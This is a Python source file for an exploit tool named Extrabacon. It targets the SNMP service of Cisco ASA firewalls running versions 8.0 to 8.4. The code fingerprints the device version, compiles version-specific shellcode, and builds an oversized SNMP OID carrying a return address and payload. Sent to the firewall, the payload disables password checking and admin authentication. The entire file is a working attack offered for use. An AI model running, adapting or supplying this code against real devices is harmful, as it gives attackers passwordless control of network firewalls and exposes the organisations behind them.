#!/usr/bin/env python

import sys
import string
import subprocess
import binascii
import random
import datetime

sc_dir = "./shellcode"
vers_dir = "./versions"

sys.path.insert(0, '..')
from Mexeggs.all import *
from Mexeggs import *
from scapy.all import *


##
##
##
class ExtrabaconInfoSubcommand(sploit.InfoSubcommand):
    expect_filename_argument = False    ##


    def setup_parser(self, parser):
        super(ExtrabaconInfoSubcommand, self).setup_parser(parser)

        self.parser = parser

        ##
        for a in self.parser._actions:
            if a.dest == "version":
                a.choices = ['v2c']
                a.help = 'SNMP version (v2c only)'

    def run(self, exp):
        super(ExtrabaconInfoSubcommand, self).run(exp)

##
##
##
##
class ExtrabaconExecSubcommand(sploit.ExecSubcommand):
    expect_filename_argument = False    ##


    def setup_parser(self, parser):
        super(ExtrabaconExecSubcommand, self).setup_parser(parser)

        self.parser = parser

        ##
        for a in self.parser._actions:
            if a.dest == "version":
                a.choices = ['v2c']
                a.help = 'SNMP version (v2c only)'

        self.parser.add_argument('--mode',
                                 help='select mode of operation',
                                 choices=["pass-disable", "pass-enable"],
                                 required=True,
                                 default=None)
        self.parser.add_argument('--msg',
                                 help='print success message on console of target (DO NOT USE)',
                                 dest='msg',
                                 action='store_true',
                                 required=False,
                                 default=False)

    def run(self, exp):
        super(ExtrabaconExecSubcommand, self).run(exp)


class Extrabacon(Sploit):

    def setup_parser(self):
        super(Extrabacon, self).setup_parser()

        ##
        self.add_subcommand(ExtrabaconInfoSubcommand())
        ##
        self.add_subcommand(ExtrabaconExecSubcommand())
        ##

    ##
    def generate_touch(self):
        return SNMP(version   = self.params.version,
                    community = self.params.community,
                    PDU       = SNMPget(varbindlist = [SNMPvarbind(oid = ASN1_OID('1.3.6.1.2.1.1.1.0')),
                                                       SNMPvarbind(oid = ASN1_OID('1.3.6.1.2.1.1.3.0')),
                                                       SNMPvarbind(oid = ASN1_OID('1.3.6.1.2.1.1.5.0'))]))

    def fw_version_check(self, vers_string):
        ##
        ##
        ##
        ##
        ##
        ##
        ##
        ##
        ##
        ##
        ##
        ##
        ##
        ##
        if vers_string == "Cisco Adaptive Security Appliance Version 8.0(2)":
            return "asa802"
        elif vers_string == "Cisco Adaptive Security Appliance Version 8.0(3)":
            return "asa803"
        elif vers_string == "Cisco Adaptive Security Appliance Version 8.0(3)6":
            return "asa803-6"
        elif vers_string == "Cisco Adaptive Security Appliance Version 8.0(4)":
            return "asa804"
        elif vers_string == "Cisco Adaptive Security Appliance Version 8.0(4)32":
            return "asa804-32"
        elif vers_string == "Cisco Adaptive Security Appliance Version 8.0(5)":
            return "asa805"
        elif vers_string == "Cisco Adaptive Security Appliance Version 8.2(1)":
            return "asa821"
        elif vers_string == "Cisco Adaptive Security Appliance Version 8.2(2)":
            return "asa822"
        elif vers_string == "Cisco Adaptive Security Appliance Version 8.2(3)":
            return "asa823"
        elif vers_string == "Cisco Adaptive Security Appliance Version 8.2(4)":
            return "asa824"
        elif vers_string == "Cisco Adaptive Security Appliance Version 8.2(5)":
            return "asa825"
        elif vers_string == "Cisco Adaptive Security Appliance Version 8.3(1)":
            return "asa831"
        elif vers_string == "Cisco Adaptive Security Appliance Version 8.3(2)":
            return "asa832"
        elif vers_string == "Cisco Adaptive Security Appliance Version 8.4(1)":
            return "asa841"
        elif vers_string == "Cisco Adaptive Security Appliance Version 8.4(2)":
            return "asa842"
        elif vers_string == "Cisco Adaptive Security Appliance Version 8.4(3)":
            return "asa843"
        elif vers_string == "Cisco Adaptive Security Appliance Version 8.4(4)":
            return "asa844"
        else:
            return "unsupported"

    ##
    ##
    ##
    def generate_runtime(self):
        try:
            f = open("%s/runtime.s" % vers_dir, 'w')

            f.write("# this file auto-generated, do not touch\n")
            f.write("\n")
            f.write(".set commstr_len, %d\n" % len(self.params.community))

            f.close()
        except:
            print "problem generating runtime.s file in versions!"
            print sys.exc_info()[0]
            sys.exit(1)

    def post_touch(self, response):
        ##
        
        ##
        values = [x[SNMPvarbind].value.val for x in SNMP(response)[SNMP][SNMPresponse].varbindlist]
        if not values:
            return False

        ##
        snmp = SNMP(response)
        print "[+] response:"
        snmp.show()

        fw_uptime = values[1]
        fw_uptime_str = str(datetime.timedelta(seconds=fw_uptime/100))
        print
        print "[+] firewall uptime is %d time ticks, or %s" % (fw_uptime, fw_uptime_str)
        print

        fw_name = values[2]
        print "[+] firewall name is %s" % fw_name
        print

        fw_vers = self.fw_version_check(values[0])
        if fw_vers != "unsupported":
            print "[+] target is running %s, which is supported" % fw_vers
        else:
            print "[-] target is running %s, which is NOT supported" % values[0]

        self.key_data = fw_vers   ##

        if self.params.verbose:
            print 'Data stored in key file  : %s' % self.key_data

        ##
        ##

        return True

    def load_vinfo(self):
        self.vinfo = self.key_data.upper()
        if self.params.verbose:
            print 'Data stored in self.vinfo: %s' % self.vinfo

    def report_key(self, key):
        print "\nTo check the key file to see if it really contains what we're claiming:"
        print "# cat %s" % self.get_key_file(key = key)
        if self.key_data.lower() == "unsupported":
            return
        print "\nTo disable password checking on target:"
        print "# %s exec -k %s %s --mode pass-disable" %  (self.env.progname, key, " ".join(self.params.args[2:]))
        print "\nTo enable password checking on target:"
        print "# %s exec -k %s %s --mode pass-enable" %  (self.env.progname, key, " ".join(self.params.args[2:]))
        ##
        ##
        ##
        print

    ##
    ##
    ##
    def build_shellcode(self):
        try:
            print "[+] ==============="
            subp = subprocess.Popen("make %s" % self.key_data.lower(),
                                    cwd=sc_dir,
                                    shell=True)
            retval = subp.wait()
            print "[+] ==============="
        except OSError, e:
            print "problem (OSError) generating %s %s shellcode" % (self.key_data.lower(), modes[self.params.mode])
            print "OSError: " + str(e)
            sys.exit(1)
        except Exception, e:
            print "problem (Exception) generating %s %s shellcode" % (self.key_data.lower(), modes[self.params.mode])
            print str(e)
            sys.exit(1)            

        if retval != 0:
            print "problem with generating shellcode"
            return False

        return True

    ##
    ##
    ##
    def build_payload(self, sc):
        payload = ""

        if self.params.mode == "pass-disable":
            payload += sc.payload_PMCHECK_DISABLE_byte
            print "appended PMCHECK_DISABLE payload " + binascii.hexlify(sc.payload_PMCHECK_DISABLE_byte)

            payload += sc.payload_AAAADMINAUTH_DISABLE_byte
            print "appended AAAADMINAUTH_DISABLE payload " + binascii.hexlify(sc.payload_AAAADMINAUTH_DISABLE_byte)
        elif self.params.mode == "pass-enable":
            payload += sc.payload_PMCHECK_ENABLE_byte
            print "appended PMCHECK_ENABLE payload " + binascii.hexlify(sc.payload_PMCHECK_ENABLE_byte)

            payload += sc.payload_AAAADMINAUTH_ENABLE_byte
            print "appended AAAADMINAUTH_ENABLE payload " + binascii.hexlify(sc.payload_AAAADMINAUTH_ENABLE_byte)
        else:
            return None ##


        payload += "\xc3" ##


        return payload

    def generate_exploit(self):
        ##

        if not self.params.mode:
            print "[-] no mode selected!"
            sys.exit(1)

        print "[+] generating exploit for exec mode %s" % self.params.mode

        if self.key_data.lower() == "unsupported":
            print "[-] unsupported target version, abort"
            sys.exit(1)

        if os.path.exists(sc_dir):
            print "[-] building shellcode in %s" % sc_dir
            sys.path.insert(0, sc_dir)

            print "[+] calling make on shellcode for target version"
            if not self.build_shellcode():
                print "[-] problem building shellcode"
                sys.exit(1)
        elif os.path.exists(vers_dir):
            print "[+] using shellcode in %s" % vers_dir
            sys.path.insert(0, vers_dir)
        else:
            print "[-] cannot find %s or %s" % (sc_dir, vers_dir)
            sys.exit(1)

        self.sc_filename = "shellcode_%s" % self.key_data.lower()
        print "[+] importing version-specific shellcode %s" % self.sc_filename
        try:
            sc = __import__(self.sc_filename)
        except:
            print "[-] problem importing version-specific shellcode from %s" % self.sc_filename
            sys.exit(1)
        ##

        ##
        ##
        ##
        head = '1.3.6.1.4.1.9.9.491.1.3.3.1.1.5.9'
        head_len = len(head.split('.'))

        ##
        ##
        ##
        ##
        ##
        wrapper = sc.preamble_snmp
        if self.params.msg:
            wrapper += "." + sc.successmsg_snmp
        wrapper += "." + sc.launcher_snmp
        wrapper += "." + sc.postscript_snmp

        ##
        wrapper_len = len(wrapper.split('.'))
        wrapper += ".144" * (82 - wrapper_len)
        wrapper_len = len(wrapper.split('.'))

        ##
        ##
        ##
        ##
        ##
        overflow = string.join([head, "95", wrapper, sc.my_ret_addr_snmp, sc.finder_snmp], ".")
        overflow_len = head_len + 1 + wrapper_len + sc.my_ret_addr_len + sc.finder_len

        ##
        ##
        ##
        ##
        if overflow_len != len(overflow.split('.')):
            print "[-] problem with computed (%d) vs actual overflow len (%d)" % (overflow_len, len(overflow.split('.')))
            sys.exit(1)
        if overflow_len != 112:
            print "[-] problem with overflow_len (%d != 112)" % overflow_len
            sys.exit(1)
        if head_len != 16:
            print "[-] problem with head_len (%d != 16)" % head_len
            sys.exit(1)

        ##
        ##

        ##
        ##
        ##
        ##
        ##
        ##
        print "[+] building payload for mode %s" % self.params.mode
        payload = self.build_payload(sc)
        if not payload:
            print "[-] problem building payload"
            sys.exit(1)

        self.params.request_id = random.randint(0x80000, 0x1fffffff)
        print "[+] random SNMP request-id %d" % self.params.request_id

        ##
        exba_msg = SNMP(version=self.params.version,
                        community=self.params.community,
                        PDU=SNMPbulk(id=ASN1_INTEGER(self.params.request_id),
                                     max_repetitions=1,
                                     varbindlist=[SNMPvarbind(oid=ASN1_OID("1.3.6.1.2.1.1.1"),
                                                              value=ASN1_STRING(payload)),
                                                  SNMPvarbind(oid=ASN1_OID(overflow)),
                                                  ]
                                     )
                        )

        ##
        ##
        ##
        ##
        ##
        ##
        ##
        offset = exba_msg.__str__().find(payload)
        print "[+] fixing offset to payload %d" % offset
        overflow = string.replace(overflow, "4.1.255.208", ("4.%d.255.208" % offset), 1)

        ##
        exba_msg = SNMP(version=self.params.version,
                        community=self.params.community,
                        PDU=SNMPbulk(id=ASN1_INTEGER(self.params.request_id),
                                     max_repetitions=1,
                                     varbindlist=[SNMPvarbind(oid=ASN1_OID("1.3.6.1.2.1.1.1"),
                                                              value=ASN1_STRING(payload)),
                                                  SNMPvarbind(oid=ASN1_OID(overflow)),
                                                  ]
                                     )
                        )

        if self.params.verbose:
            print "overflow (%d): %s" % (overflow_len, overflow)
            print "payload (%d): %s" % (len(payload), binascii.hexlify(payload))
            print "EXBA msg (%d): %s" % (len(exba_msg), binascii.hexlify(exba_msg[SNMP].__str__()))

        ##
        if len(exba_msg) >= 512:
            print "[-] final SNMP msg is too large (%d >= %d) abort" % (len(exba_msg), 512)
            sys.exit(1)

        ##
        ##
        ##
        ret_list = [exba_msg]
        return(ret_list)

    def post_exploit(self, response):
        ##
        ##

        snmp = SNMP(response)
        print "[+] response:"
        snmp.show()

        recv_id = int(snmp.PDU.id.val)
        if recv_id == self.params.request_id:
            print "[+] received SNMP id %d, matches random id sent, likely success" % recv_id
            return True
        else:
            print "[-] received SNMP id %d, expecting %d, mismatch! This is probably bad" % (recv_id, self.params.request_id)
            return False


if __name__ == '__main__':
    exp = Extrabacon('Extrabacon', '1.1.0.1')
    exp.launch(sys.argv)
